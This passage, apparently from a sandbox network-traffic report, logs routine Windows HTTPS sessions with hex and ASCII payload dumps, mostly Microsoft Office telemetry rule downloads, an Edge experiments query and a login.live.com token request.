                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:37 UTC8192INData Raw: 79 22 3a 22 43 68 72 6f 6d 65 55 41 22 7d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 33 6d 69 6e 2d 63 6c 61 73 73 2e 6f 66 66 63 6e 2e 6d 6f 62 69 22 2c 22 61 70 70 6c 69 65 64 5f 70 6f 6c 69 63 79 22 3a 22 43 68 72 6f 6d 65 55 41 22 7d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 6d 61 69 6c 2e 6e 61 74 65 2e 63 6f 6d 22 2c 22 61 70 70 6c 69 65 64 5f 70 6f 6c 69 63 79 22 3a 22 43 68 72 6f 6d 65 55 41 22 7d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 66 69 74 6e 65 73 73 74 65 73 74 2e 78 74 75 2e 65 64 75 2e 63 6e 22 2c 22 61 70 70 6c 69 65 64 5f 70 6f 6c 69 63 79 22 3a 22 43 68 72 6f 6d 65 55 41 22 7d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 6d 69 72 6f 2e 63 6f 6d 22 2c 22 61 70 70 6c 69 65 64 5f 70 6f 6c 69 63 79 22 3a 22 43 68 72 6f 6d 65 55 41 22 7d 2c 7b 22 64 6f 6d 61 69 6e
                                                                                                                                                                                                                                                                                                                    Data Ascii: y":"ChromeUA"},{"domain":"3min-class.offcn.mobi","applied_policy":"ChromeUA"},{"domain":"mail.nate.com","applied_policy":"ChromeUA"},{"domain":"fitnesstest.xtu.edu.cn","applied_policy":"ChromeUA"},{"domain":"miro.com","applied_policy":"ChromeUA"},{"domain
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:37 UTC1772INData Raw: 22 3a 22 66 61 6c 73 65 22 7d 2c 22 48 65 61 64 65 72 73 22 3a 7b 22 45 54 61 67 22 3a 22 5c 22 44 2b 47 6c 33 6a 4f 55 62 31 43 76 53 69 47 77 62 51 32 63 50 62 50 55 71 52 33 52 31 49 69 4e 35 74 64 57 70 33 31 68 42 69 73 3d 5c 22 22 2c 22 45 78 70 69 72 65 73 22 3a 22 57 65 64 2c 20 32 37 20 4e 6f 76 20 32 30 32 34 20 30 39 3a 30 36 3a 33 37 20 47 4d 54 22 2c 22 43 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 53 74 61 74 75 73 43 6f 64 65 22 3a 22 32 30 30 22 7d 2c 22 43 6f 6e 66 69 67 49 44 73 22 3a 7b 22 45 43 53 22 3a 22 50 2d 52 2d 31 30 38 32 35 37 30 2d 31 2d 31 31 2c 50 2d 44 2d 34 32 33 38 38 2d 32 2d 36 22 2c 22 45 64 67 65 22 3a 22 50 2d 58 2d 31 32 35 33 31 36 36 2d 34 2d 35 2c 50 2d 58 2d 31 31 32 36 34 34 35 2d 32 2d 35 2c 50 2d
                                                                                                                                                                                                                                                                                                                    Data Ascii: ":"false"},"Headers":{"ETag":"\"D+Gl3jOUb1CvSiGwbQ2cPbPUqR3R1IiN5tdWp31hBis=\"","Expires":"Wed, 27 Nov 2024 09:06:37 GMT","CountryCode":"US","StatusCode":"200"},"ConfigIDs":{"ECS":"P-R-1082570-1-11,P-D-42388-2-6","Edge":"P-X-1253166-4-5,P-X-1126445-2-5,P-


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    44192.168.2.74977013.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:36 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:37 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 423
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: dc0e6055-901e-005b-2d91-3f2005000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080637Z-174f78459688l8rvhC1EWRtzr00000000960000000008b3n
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:37 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    45192.168.2.74977213.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:36 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:37 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:36 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 404
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 5685fe29-701e-0098-4071-40395f000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080636Z-174f7845968cpnpfhC1EWR3afc0000000wcg000000000pdc
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:37 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    46192.168.2.74977113.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:36 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:37 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 478
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9B233827"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 1fa1b817-401e-0067-5691-3f09c2000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080637Z-174f7845968ljs8phC1EWRe6en0000000whg0000000033vy
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:37 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    47192.168.2.74977813.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:37 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:37 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB046B576"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: be7987d0-001e-0034-1e91-3fdd04000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080637Z-174f7845968zgtf6hC1EWRqd8s0000000pr0000000000965
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:37 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    48192.168.2.74978294.245.104.564438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:37 UTC428OUTGET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:38 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Content-Type: application/x-protobuf; charset=utf-8
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:37 GMT
                                                                                                                                                                                                                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                    Set-Cookie: ARRAffinity=1126f8913d8e3f0ad6200b0ed68ff383e852f8c2c11952a490e484488dbfc120;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                                                                                    Set-Cookie: ARRAffinitySameSite=1126f8913d8e3f0ad6200b0ed68ff383e852f8c2c11952a490e484488dbfc120;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                                                                                                    Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9
                                                                                                                                                                                                                                                                                                                    X-Powered-By: ASP.NET


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    49192.168.2.74978620.231.128.67443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:39 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                    Content-Length: 3592
                                                                                                                                                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:39 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:40 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                    Expires: Wed, 27 Nov 2024 08:05:40 GMT
                                                                                                                                                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                    x-ms-route-info: C531_BL2
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 69e35885-0063-40c1-83cb-f65dd817b6ae
                                                                                                                                                                                                                                                                                                                    PPServer: PPV: 30 H: BL02EPF0001D775 V: 0
                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:39 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Content-Length: 1276
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:40 UTC1276INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    50192.168.2.74979513.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:39 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:39 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 448
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: e14f358b-d01e-007a-5d7e-3ff38c000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080639Z-174f7845968vqt9xhC1EWRgten0000000wt0000000001php
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:40 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    51192.168.2.74979113.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:39 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:39 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 400
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB2D62837"
